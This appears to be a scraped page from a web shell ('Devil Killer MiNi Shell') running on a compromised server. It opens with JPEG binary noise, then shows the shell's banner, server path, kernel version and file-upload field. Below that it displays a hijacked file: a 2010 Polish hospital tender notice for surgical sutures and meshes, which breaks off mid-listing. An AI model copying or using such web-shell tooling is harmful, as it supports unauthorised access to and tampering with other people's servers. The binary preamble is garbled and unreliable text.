JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101011/326156-N-2010.html

<p class="kh_header"><b>Suwałki: Dostawa  materiałów szewnych dla SPSW w Suwałkach</b><br>
<b>Numer ogłoszenia: 326156 - 2010; data zamieszczenia: 11.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów szewnych dla SPSW w Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów szewnych dla SPSW w Suwałkach w asortymencie i w szacunkowej ilości określonych w załączniku nr 4 do SIWZ w okresie 12 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w prawidłowej wysokości dla danego zadania, na który Wykonawca składa ofertę. Kwota wadium dla ofert całkowitych wynosi 9 326,50 zł, a dla ofert częściowych: 

Nr pakietu	Wysokość wadium
   1	                 171,40 zł
   2	              1 704,00 zł
   3	                 277,00 zł
   4	                 296,90 zł
   5	              2 878,20 zł
   6	              3 627,20 zł
   7	                 111,20 zł
   8	                 225,70 zł
   9	                   34,90 zł
 
2. Wadium może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (musi być poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (art.45 ust. 6  PZP). 
3. Wadium musi być udzielane do końca terminu związania ofertą.                                                                                                       4. Wadium wnosi się przed upływem terminu składania ofert.
5. Wadium wnoszone w pieniądzu  wpłaca się  przelewem na poniższy rachunek bankowy Zamawiającego :  

Kredyt Bank S.A. 1710 Oddział KB S.A. w Suwałkach Nr konta 42 1500 1719 1217 1002 6998 0000

6. Warunki zwrotu wadium i utraty wadium reguluje ustawa pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące::

1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.  
2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:

1) oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:  
1) posiadania wiedzy i doświadczenia. 

2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:

1) oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące::
1) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.      

2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:

1) oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące::
1) sytuacji ekonomicznej i finansowej.     

2. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wymaga dołączenia do oferty:

1) oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w ust.1 - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>katalog (prospekt), w którym został zaznaczony oferowany asortyment (pozycja z kodem) -  w przypadku firm dysponujących katalogiem (prospektem) zawierającym różny asortyment. W przypadku firm, które dysponują odrębnymi katalogami (prospektami) dla oferowanego asortymentu zobowiązane są one do dołączenia do oferty tylko tych katalogów (prospektów), które dotyczą oferowanego asortymentu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
1.1. zmiana stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Wojewódzki w Suwałkach, Dział Zamówień Publicznych, ul. Szpitalna 60, 16-400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 11:30, miejsce: Kancelaria Samodzielnego Publicznego Szpitala Wojewódzkiego w Suwałkach, ul. Szpitalna 60, 16-400 Suwałki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET I - Szew syntetyczny pleciony wchłanialny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Szew syntetyczny pleciony wchłanialny, zdolność podtrzymywania tkankowego po 2 tygodniach min 80%, po 3 tygodniach min 30%, czas wchłaniania 56 - 70 dni  		
1. Rozm. nitki 5/0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 17 mm) - sasz. 108
2. Rozm. nitki 4/0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 22 mm) -  sasz.108
3. Rozm. nitki 3/0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 22 mm) -  sasz.180
4. Rozm. nitki 2/0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 22 mm) -  sasz.180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET II - Nici niewchłanialne syntetyczne - polipropylen, monofilament z dodatkiem glikolu polietylenowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Szew niewchłanialny syntetyczny - polipropylen, monofilament niepowlekany, niebieski, barwiony ftalocyjaniną miedzi  		
1. Rozm. nitki 0, dł. 75 cm z igłą tnącą (3/8 obwodu koła, wielkość 39 mm) - sasz. 1080
2. Rozm. nitki 2/0, dł.75 cm z igłą tnącą (3/8 obwodu koła, wielkość 26 mm) - sasz. 1800
3. Rozm. nitki 2/0, dł. 75 cm z igłą okrągłą (1/2 obwodu koła, wielkość 26 mm) - sasz. 180
4. Rozm. nitki 3/0, dł. 45 cm z igłą tnącą (3/8 obwodu koła, wielkość 24 mm) - sasz. 1080
5. Rozm. nitki 5/0, dł. 75 cm z igłą okrągłą (3/8 obwodu koła, wielkość 13 mm) - sasz. 36
6. Rozm. nitki 4/0, dł. 45 cm z igłą tnącą (3/8 obwodu koła, wielkość 24 mm) - sasz. 540 
7. Rozm. nitki 4/0, dł. 75 cm z igłą okrągłą (1/2 obwodu koła, wielkość 22 mm) - sasz. 72
8. Rozm. nitki 5/0, dł. 45 cm z igłą tnącą (3/8 obwodu koła, wielkość 19 mm) - sasz. 36
9. Rozm. nitki 6/0, dł. 45 cm z igłą tnącą (3/8 obwodu koła, wielkość 16 mm) - sasz. 36
10. Rozm. nitki 6/0, dł.75 cm z 2 igłami okrągłymi (3/8 obwodu koła, wielkość 13mm) - 	sasz. 144
11. Rozm. nitki 7/0, dł. 75 cm z 2 igłami okrągłymi (3/8 obwodu koła, wielkość 9mm) - sasz. 36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET III - Siatki do leczenia przepuklin brzusznych i pachwinowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Siatka prosta - polipropylen jednowłóknowy; porowatość 1,5 - 1,7 mm; waga 60 - 75 g/m2  o wymiarach  15 x 15 cm  - szt.	10
2. Siatka prosta - polipropylen jednowłóknowy; porowatość 1,5 - 1,7 mm; waga 60 - 75 g/m2  o wymiarach  30 x 30 cm  - szt.	5
3. Siatka do operacji metodą Rutkowa - siatka polipropylenowa, średnia M - szt.14
4. Siatka do operacji metodą Rutkowa - siatka polipropylenowa, duża L - szt. 18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Nici niewchłanialne syntetyczne - plecionka poliestrowa, powlekana silikonem, w kolorze niebieskim lub zielonym i białym		
1. Rozm. nitki 2, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 37 mm)	 - sasz. 324
2. Rozm. nitki 1, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 37 mm) - sasz. 144
3. Rozm. nitki 1, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 27 mm) - sasz.	36
4. Rozm. nitki 0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 30 mm) - sasz. 396
5. Rozm. nitki 2/0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 30 mm) - sasz. 540
6. Rozm. nitki 3/0, dł. 75 cm z igłą okrągłą (3/8 koła, wielkość 20 mm) - sasz. 108
7. Rozm. nitki 4/0, dł. 75 cm z igłą okrągłą (3/8 koła, wielkość 13 mm) - sasz.   36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Nici wchłanialne syntetyczne - monofilament syntetyczny, szybkowchłalnialny niepowlekany, polyglotyne; zdolność podtrzymywania tkankowego po 5 dniach 50 - 60% pierwotnej siły, po 10 dniach 20 - 30 %, czas wchłaniania 40 - 56 dni		
1. Rozm. nitki 1, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 37 mm) - sasz. 1800
2. Rozm. nitki 1, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 30 mm) - sasz.	288
3. Rozm. nitki 0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 37 mm) - sasz.	360
4. Rozm. nitki 0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 27 mm) - sasz.	396
5. Rozm. nitki 2/0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 26 mm) - sasz.576
6. Rozm. nitki 3/0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 26 mm) - sasz.360
7. Rozm. nitki 4/0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 22 mm) - sasz.180
8. Rozm. nitki 5/0, dł. 75 cm z igłą okrągłą (1/2 koła, wielkość 17 mm) - sasz.144
9. Rozm.nitki 1, dł.75cm z igłą okrągłą (1/2 obwodu koła, wielkość 40mm) - sasz.144
10. Rozm. nitki 1, dł.90cm z igłą okrągłą (1/2 obwodu koła, wielkość 48mm)- sasz. 216.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Nici wchłanialne syntetyczne - pleciona, skład 100% kwas poliglikolowy, powlekana poliglikonatem, fioletowa; zdolność podtrzymywania tkankowego:  14 dni 60-70 %; 21 dni 24 - 42%, czas wchłaniania 60 - 90 dni 		
1. Rozm. nitki 2, dł. 90 cm z igłą okrągłą pogrubioną (1/2 koła, wielkość 37 mm) - sasz. 2340
2. Rozm. nitki 2, dł. 90 cm z igłą okrągłą (1/2 koła, wielkość 48 mm) - sasz.  180
3. Rozm. nitki 1, dł. 70 cm z igłą okrągłą (1/2 koła, wielkość 30 mm)	 - sasz. 1260
4. Rozm. nitki 1, dł. 90 cm z igłą okrągłą (1/2 koła, wielkość 37 mm) - sasz.	540
5. Rozm. nitki 0, dł. 70 cm z igłą okrągłą (5/8 koła, wielkość 36 mm) - sasz.	180
6. Rozm. nitki 1, dł. 140 cm bez igły - sasz. 720
7. Rozm. nitki 0, dł. 140 cm bez igły - sasz. 252
8. Rozm. nitki 0, dł. 70 cm z igłą okrągłą (1/2 koła, wielkość 30 mm) - sasz. 2160
9. Rozm. nitki 0, dł. 70 cm z igłą okrągłą (1/2 koła, wielkość 37 mm) - sasz.	720
10. Rozm. nitki 0, dł. 90 cm z igłą okrągłą (1/2 koła, wielkość 48 mm) - sasz.	720
11. Rozm. nitki 2/0, dł. 70 cm z igłą okrągłą (1/2 koła, wielkość 26 mm) - sasz. 2160
12. Rozm. nitki 2/0, dł. 70 cm z igłą okrągłą (1/2 koła, wielkość 30 mm) - sasz. 612
13. Rozm. nitki 2/0, dł. 70 cm z igłą odwrotnie tnącą (3/8 koła, wielkość 24 mm) - sasz. 504
14. Rozm. nitki 2/0, dł. 90 cm z igłą okrągłą (1/2 koła, wielkość 37 mm) - sasz. 108
15. Rozm. nitki 3/0, dł. 70 cm z igłą okrągłą (1/2 koła, wielkość 26 mm) - sasz.1800
16. Rozm. nitki 3/0, dł. 70 cm z igłą odwrotnie tnącą (3/8 koła, wielkość 24 mm) - sasz. 288
17. Rozm. nitki 4/0, dł. 70 cm z igłą okrągłą (1/2 koła, wielkość 22 mm) - sasz. 540
18. Rozm. nitki 4/0, dł. 70 cm z igłą odwrotnie tnącą (3/8 koła, wielkość 16 mm) - sasz. 252
19. Rozm. nitki 4/0, dł. 45 cm z igłą odwrotnie tnącą (3/8 koła, wielkość 12 mm)- sasz. 216
20. Rozm. nitki 1, dł. 90cm z igłą okrągłą tępą (1/2 koła, wielkość 40mm) - sasz. 180
21. Rozm. nitki 5/0, dł. 70cm z igłą odwrotnie tnącą (3/8 koła, wielkość 19mm) - sasz. 36
22. Rozm. nitki 5/0, dł. 70 cm z igłą okrągłą (1/2 koła, wielkość 17 mm) - sasz. 108.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.11.28-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET VII - Nici niewchłanialne syntetyczne - monofilament.</p>
